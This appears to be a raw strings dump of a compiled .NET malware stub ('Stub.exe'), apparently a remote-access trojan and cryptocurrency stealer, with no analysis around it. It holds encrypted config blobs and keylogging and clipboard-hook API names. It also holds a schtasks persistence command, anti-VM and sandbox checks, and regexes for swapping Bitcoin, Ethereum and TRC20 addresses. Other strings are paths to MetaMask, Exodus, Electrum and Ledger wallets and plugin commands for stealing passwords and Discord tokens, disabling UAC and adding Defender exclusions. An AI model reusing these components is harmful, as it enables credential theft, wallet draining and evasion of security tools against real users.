!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Main>b__0_0
<Read>b__0
<GetText>b__0
<SetText>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
laKfreWQWoLFA
wtRMnygXCKA
LNRgPMtuUaLA
xyJEumedczRA
yJoFAChYdA
MWOjYwkkxGkA
SystemParametersInfoA
aIjVQYIeVsBrA
OQRPkEPJoibObcDB
QLhzbvlwDMB
NCvMFmbeDcRB
oTXxybpKTiNQZB
DwknhTVGVtdeB
QdJJEbkDvmHCrVulB
dkYVpfhvOBxB
AamerulbUBC
jbuLDUEcVLQC
txGmzeoVdJVIXC
LWLrWLNtWCFFfNOYC
EnnGxQUsPBoqYC
VThLtNxebC
fVMxUfHxJIKPobC
toCGTrfpfngC
WydKXWAzbiC
HlSJnnrFPozDlC
sPBUiMVsadbipwC
kbQqlQgKXwwC
MapNameToOID
get_FormatID
TdjhRpkvynZD
fIuWjsiDtobD
BEQnGalegshD
aHgOepNREjD
rBPIcdtvJBvD
eKldnGBeJvbmQGE
RYgAFkinpKE
nLtwaPuqKE
UjpOpNBgnOE
AAWlXUfTGaE
lfEaImahDjE
vSagncRCclE
OflkYuhPYplE
WPIFNgqIjSKGQnE
mWDsuFgmoE
swEUeImAUubvoE
RqJbLrlGqE
NUWolEBBtE
GZkHTGiwtE
OejBvgkgOmdvE
VwZURbxVOtUzE
tXCbaTWpMCF
FQCVcnOYDF
bAuKPXwXqngHF
fOTLaipvUWMF
CntcyoQFTF
DTEbVpzGyjYF
HJoJxbXZmZF
fTyFooskNrwThF
GuYtCAmTLlF
VTbRgBBmjbLlF
zhWaiAQWraDrF
rLzDEzahqwNG
BPoHthhrviG
TYsOkidPBUqG
kAwTUeWfWIpqG
OubtnpqCIskpssG
AOeDsZCKXtqSuG
dLyUwSjWKzBH
RXJlrCSaJH
skOiUOVRdLH
ZDwisiUuDlXHAqENH
iIlTdmvlxYPH
bDxKFLVsFQCTH
vBdnpSlCdpqUH
WNCwivmtpbH
bzohgcojSuNcH
JtVdvPUJBnkhH
XFIIbYMwEqsH
cjJlAnkjlluH
rGwunnrouH
VubZQcxdjpbvH
gtfrlHyVdolwH
PIgDWNIwBI
get_ASCII
vxcHxCTjsuLI
FFZtDmkUOqIdxaI
RhMYEHLYreQKlGgI
KSPXYKRWOgJYgjI
aFCUzBIUqixLrI
HaDQaCzemNpCvsI
HMkxHSFHBfpuI
NOwzoEPzJRwI
SotLKwteNjwI
vbJkiHrCgJVBJ
QXtwhdaVraEJ
XxrPgrWcUGJ
SxJeSPYLyzgBtGJ
NYOVFVdCyHJ
TdETbTPrQJ
VvWvcFlSaKaJ
yodZAHgSSIwYgJ
bDjDgbEaeKttslJ
QqHnjMxUmXytTpJ
upGIVtJFWCtJ
bpXbAplvKFK
JNaqbzTAqjFK
rdacCkxEzIIOsOK
FEmNcBzMoYhABSK
YLlEscSqTK
bqxOEIEyOVxfK
WYZdOXiKvLdhxUyK
KbmOGpuRCL
yVhjNvvDZoVL
zAqgYGQqILfXL
CmNvDVDryfzXL
pwuyKkNopQMMmgL
DPAQIGAkcpL
TReIQyAubIkxL
NmysGUSVNVBM
uLHAxJHzwvGM
SXwIFjwVBdKM
TwXAqYEDlsCRM
vQcNcRVbBVM
IKBlBMsHVM
RDxJcuKRBcZKcM
EWEZzlszfM
zumsVvEouxhIngM
URvJydJwIIqjM
otqbkzCMXQamM
QulvxfWrmkchiboM
flXOKMLrHzzJxM
GInkOiWkjJkDN
NrPAXsXavmEVXN
xWljjPaXXinZN
fsgRHRaHThN
yFNWruqBZsuvN
oTaXluLUikNyN
NADgpmBQRIcGO
yTXSXSIxytGO
yPFjNvGWvCuRJHO
System.IO
oqGuSGTAPO
uiCTKVLkPO
vGNAOoWomgnSO
wXLPPpRLrSlO
pNCazPzCmoO
KVRsgrfuXisO
fGkFARRmzvO
tCmrFundZzO
vTwFETHrazO
MQcRzRDjriKTHP
nOslYgZbHLP
xOlPWBsjutYILP
GCEFuuRYZrZP
VPfkQWHDFGyaP
iStBhnmbDdP
woKxDWQkHzAQ
PebPXdwYyDQ
uuNKkpLIqHQ
mzoolvBkGvmFMQ
qVYSuhdQRQ
mkVVKFiBGZQ
pFGgUBysFpPZQ
YIRyMIMtTglQ
aMkRlXKzcjEoQ
KAUTiEBVUoQ
gIhwDDHHrQ
sqaKxNEWqvQ
GwisZazDyQ
cGdlfzCgdLR
ltboMuZcvKcMR
kWiTbPtYjXNR
AUzLvBxMMRVR
RXljCdeYgKIXR
btkcpzJPIgQdR
xCjouxoXpoCOxfR
HThxtvdMhR
wYLXyZvKOiwSZlR
ZEdajMFLmlR
JHfcbZoNlsvpR
ZfZjTrAFtfVxR
VOlesUspETgeNS
qdVUBxLMcnFIeaS
KOmwdulvTPeS
AdMRVXMsEVwgS
VNhitGUKZTEkS
FjkWvgeYqvS
aDlGDHdbJVXACET
LgZKNcOXfMiixIT
JoHphiOaeyrMT
JiLYuEItoLSTuEXT
sQXjiAsXMXT
oQaLxmLgvqgT
YPJfXFRShJyCkT
SaNiQElIjqT
kSxbMykhxxMrT
QQzFXXAgTWDGU
KxIPtaWJMU
AHtxfYrkuKfJOU
nDKgknAKWZVWMnDhU
gQqTGPcxDIHhU
FfdlfgxKGiU
YGKOkQeGwygfrU
get_IV
set_IV
GenerateIV
ZGrCPbRPNV
nccZyoXCjrDvQV
GAIMYSPlsPUSV
uHCpUZXuhVTeV
ASgzRJbkmOKohV
CTWiEXLzRnlV
ifkmjXHJIarV
VHzaAdOjHrvsV
szOMvxXesYIvV
SfnHhGDkKDzV
wWwzsDOwpuAW
yWGWMyUdNnqDW
XGXAUYtCUFpftCQEW
DqSBRryxBIW
NNhPCdchVPW
yuRMDRVMYhGImnjiPW
DJBnoJJgzlPW
pSwuGDTCVjW
TpRgBVSgXXoMCX
QFiPKbtgPHPX
ijJJPEveJkfbSX
wsJpgAaXVmCTX
HcJMPFFfzBYOYX
HPHpiAobAETEWcX
yFKnxtWmMdX
TDVwYfkjZBpX
IgZFqgRoVYCfdLwX
AsGVXhKUTMkAY
drnqndaxPAxXY
zPUelAkikaY
tQjuOtpwcqbY
ofavBOjkTxNeY
vdNveXSIPPpHhwY
MGhBQOSotCZ
faMVSXXJHLcDZ
UbxDYzeymGZ
KJZyJpiMLZ
ypGEXafWEVZ
HOVWigROyZdhZ
twKCtKWglZ
AzbXFiDEQEHVIpZ
ZcDovcIGFjtgrZ
OMRQjBLJvsXLwZ
value__
AvPNzmwHXVMeRa
vzBcFkFWUa
DMWDSDysLca
sJCBPPRMYshmeja
kXCbBNLuhcSXlpa
nBHrABtrSOqbBza
hxtoCDzhkza
SsNrcUcqTCb
KVkwOpPYePFFb
VdqpvwxfLLFb
PVSVtRRZhFb
oVxDesxRCUWjHb
DQqzNWlIXSYb
mfKDqhnVAYrjNcb
mscorlib
ymqBFnjcIZjb
vbGnEnDfrb
iSSloPmCHdsb
NJPySHMdMwb
ixtJRHDLhFTrwb
OHbtlxYWicicGc
ulkFAInJIAVBMc
vZRksTbKXGQSc
AulXLsCeIOxbVc
rXobQPoZLedc
isQDydrShc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
WndProc
TIJsBmXEDZRqpc
JZgexGSJEKrpc
WJfqyqGjMuc
xBbklSMrEDd
GetWindowThreadProcessId
GetProcessById
DGidbUfHJd
XDBDVlOuoKd
MwarIKdmPSjDTQd
hRlijnIpZdRGSd
hUrNxHPBhVVSd
EndRead
BeginRead
Thread
MljDFQxehsOHNTbd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
hWndChild
Append
RegistryValueKind
CompareMethod
method
Clipboard
cYTBnUAFiEAtd
syCCeTrHmtiRUDe
ZiWegSIbLe
MZFsbWOilzjRe
DFnJeKBlEhUe
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
qXDbSdWZywhe
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_ExStyle
set_ExStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
SizeOf
VQuSceqxYfYUPf
fnYhPgnkdgf
zpkynoDZblf
xtPRMzlqmoXwf
DkxrIwhUqcnFxf
YiofxrLBCg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
get_Msg
lzdRMdcHCh
kLjJVooeSSJh
irGDmjbLAMMh
SUzcYzmmaQh
RTvqBCmHvTRh
UZReEQlbSh
EusTUDGaaAyYh
aLCBflWScfh
feXZPJEHRhh
FaarpyZysPQyqh
ComputeHash
VerifyHash
pEiEUOVsenpGxdsh
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
xtmTgYRYyWlovh
BloFrSEpnyh
hLLZJAWDDXkdvRbi
lcKmXWlbHgi
tzPZKzxhxEDwi
GOsBDnsskdiJj
iptsxwPbBOj
STvwHezChvXLYHKPj
XDpcaOTBTITVj
aaUAYYHfYj
GJJFZgiYvzsicj
aToQIxfyBmj
OceWLYBfsj
fzVSXpLeRyVHoQk
fRZGPNGdzJUk
ejIaPUEcQaUk
WganHSyNsAwBWak
uOTRyXPcHMTck
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
ucYvLzmcjk
MAMLjHGnHXyIuk
lwbevvykYlkuk
WlGckBScEl
CPTcdVXeUzRGl
nIApCqfeXpDHl
jjWlwYtzMHWVl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
zViNihlWyzojl
kernel32.dll
user32.dll
ntdll.dll
Control
YYoGdrgNECPDmxl
eMUtvEmbQQUDm
WySSpnWcvBSBsKm
JmcKhtpbaOm
jOqIyVRgWm
pWKmagIAKHOYm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
get_Item
get_Is64BitOperatingSystem
DLYSLJiAGQfQfm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
hgDQNCivIkm
Random
ICryptoTransform
IslIoaYNxStm
BYiVmSazKeiBvm
mmFQGALibAn
bfxpXJJckBkoLn
ToBoolean
TimeSpan
X509Chain
AppDomain
get_CurrentDomain
DLiLEtYdnjn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
pattern
HPVNJIAGGztn
EDKkhXWcLBo
bbIHoihBHFQDo
DfkKQUeLBIjEo
yqNneUbVsmnnFFo
vOxpShSodKo
cSBwrEnbTrjPAFMo
UZygycCTFHFNo
aaZyCPZscPo
GBqLbPVBuTo
euyXoLSTwxPco
xgyLVaQssdo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
elsMyBFOkyfo
XDcRmRLPho
KnDUVcdaGato
lnhsVEOmsTxo
xnUnixJNwLzo
oksaafLBORoBp
HJxeyrOIDpYSp
NcaGxHwYRodp
rZWVLGVpQEtlmp
mdIhQOpnGnp
Microsoft.CSharp
jrjYvBfatctp
FSFNVNtcKq
ozFXpdttYq
ChaIcNgywPaq
lSKbJkLageckq
System.Linq
TbJSbjbAdr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
AddClipboardFormatListener
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
PaGXOIBiwAfGKgr
AFEQhfxXVcXnjr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
zluFbBMfApWNvr
kgZtSrQKnJQwr
evCHSxZFukFFs
cTRCvjzPnHmKRs
ApXaNuXoVAWas
System.Diagnostics
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
yLyTfLTGgDmUgs
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
pzwJaNgyUjKuwbgs
Strings
SessionEndingEventArgs
KCLFrBwFujs
ICredentials
set_Credentials
Equals
SslProtocols
get_CreateParams
System.Windows.Forms
LQpwrRdoCSwdSns
Contains
System.Text.RegularExpressions
System.Collections
StringSplitOptions
HxVTWWKTpLqs
JEPKUsyOEvCrs
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
get_Success
GetCurrentProcess
IPAddress
qsLjkxCuYmByYts
System.Net.Sockets
set_Arguments
SystemEvents
Exists
kApzPQTKglCBt
NIWtndZvccCt
naJrUlyZnHBKAEt
sjRnNmMJhdhfEt
tBFmurIReDNGt
kNoCDLTVKt
CpVEWWOAVhjcXcOt
IjIbsWwmmmTt
QVDCySoGfJUt
WyhnxGvBAdeUt
ElcBmXeJoKyHaXt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
SlbiCtofmsft
op_Explicit
IAsyncResult
RegexResult
result
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
SetParent
hWndNewParent
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
vynCJQhgOJpt
ParameterizedThreadStart
Convert
FailFast
ToList
BsoBEvURatt
GetKeyboardLayout
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
vFlffZUFGOTMAu
cvZmFrSaKu
OnlYBfEBTUKPu
cABCITorRu
oKfjmkHnXu
fARrOEGUlpXu
jqixLIHxanabu
xtcEFSKAxcu
AbrRRqpeHwfPviu
sgTupzqyiYou
PYQgfDuXQEDuTCv
YWWDEFkqQOv
VaKBPmyOQv
bwxBaHbgpaBxeITQv
QBymnOOelikgcZv
aBgXsBPIqXkAfv
DLfuoYuQcxv
FElIHyXKPinVyv
qfjowXaFVHw
GKzIxjBdHw
ugDKuPJgIDYEPw
lZjlovCHRdLNgiw
GetForegroundWindow
set_CreateNoWindow
lFLOQVGaKMAqw
rvEEpsNgzjfWqw
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
yAcpuEJXpSdJx
HJUvbSXlebqZEVKx
dipzIoXfhVWGRx
eTETVNwuVx
AzwdhIBnEJuNzXx
oxbmRgyjXUhx
sspgXXZVrykx
yeIYljsGAox
vXZTTGZIlzlPqx
BlginUIxeux
ZxAGPEubiEy
GhRzSMEnjEFy
gbaTzaIsmVJbIy
jyqBnyjSwOmJWy
gtEERIWmaWlLWy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
HmPrHfZmjy
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
XbfmcWtZLYSFz
UYWYwuiYPMHz
xlnFsQjLVcHz
CWQioLRgbFlacdJz
tWdCVOzXKz
HpAXfMqQYNz
JTaplnQXfdGwOOz
CRMxwANHvJkQz
krLoSrqsFlkjUz
wDdyzQiapWnaZz
LQIPoRkYSOvQez
tOlphAotpz
xxfhfcODmrz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
EmYByNGBuO7AqgesizBy2KFx9aVeMnkkuNEX5qwS3S90DNcdETSlHPE4Qg7fCRifq1LZIAIyOXwcGHF+nw62QS/dQR48lpO7NnlpMeEGHdo=
xuBOSFs9u/89lOb4CX+/PSYtVYDjy1kVPT8KsTY5d0B5CZ/e6WJvr5sAmQKSDZrq3F8vKI4DGIURg2/foA6R1g3Fdi3eACg+y44vQdDTIVA=
0Q3f9GF4deOP3yY5ht7avt+cnuo/YPueNsA/ZjwSUPJFCmJA7ZX9lxT4zgJhvR6lNw4ECi5ggg/BuwHnigc9vuNDCa2W+0mrlzxGr8Mij6E=
Tc9Au0TisH340aqQVdZmKDg3YjpdpUEUxIWj+LK4LKaLVcJ1pzs70XoVNRSb0ujc4l+1fOlxmtBL1JNgvBHOpQ==
%AppData%
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
TgXIGxwmVIWt0uzQdQSddKZHqC8rO4bHUerYWB3FScUeDV28HTa1sOnea2GN5qGn1142U15c7FGbZrNY2EvmIA==
5P8NFWY2lHj8lx6MYPL6mVCk91RT7CDIRw8hfFvHIyuDbkyd+Ozk7SYSZDsvZP2jB5AzOBMESdZL91dwfXG2IA==
7pPmkCVId2w3WPWBudW3YUEEaGxLZOmQOPGuQPnbiDmcz+y6wlW2VlShLmu2XI1vqFzdNNIcuKFECSKaQxfjKg==
XX6V8QMnFuysKmO3DrcV+hO26H6wCDkfRb0Gy+dPAccERyfdLoeWukupX/RGdT+ibH5SpSadjsIoTDbJZE//zg==
RSQEAd5h4dvHB/1RRo0tf27jKPx+86jD3o1dFqbCsI3FyFt/3Esrhb+AmBnRo1xe3u6OodYLuhF2GW2tsQRKXA==
nYLcT1Y+BAlyM0nuALhgZDtHzDgtkREnZAhYqokhzJsal9u0o7sGiJ6FgfGADZDk+3SBei9PzAcZA1xvgtwx5A==
/JFN+61RZvgJI/78rexLL1jQl24qRwtd0j4cCFqljx0rcTVioBrFwCZWLYUNi6jerfsJ90yIXYaDgMVBgiluZA==
Ez+tfN1X5uvW8vRCTVci3IItSQhS4AcZG7Zok5NOZ+S3aj/KoXeXJnF5S2gVRrppd5OPdlyOL4dPDQVidtZ0Ag==
50VzKJc6Fa64gwFPg3BkMEq5PheGODSdIzy68NDNxVmtR8JHbcXRDsPwvqfJLmX/JwnScPoCYS79hPLKi2B4fA==
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\b
\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\b
T[A-Za-z1-9]{33}
BTC Clipper
ETH Clipper
Trc20 Clipper
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Puplic
MetaMask
\AppData\Roaming\Bitcoin
btccore
Bitcoin Core
\AppData\Roaming\Exodus
Exodus
\AppData\Roaming\atomic
atomic
Atomic
\AppData\Roaming\Electrum
Electrum
\AppData\Local\Coinomi
Coinomi
\AppData\Roaming\Ledger Live
Ledger
\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Installed
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
sendPlugin
Hashes
AllInOne
Password
Tokens
Reset Scale succeeded!
BackProxy.Class1
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0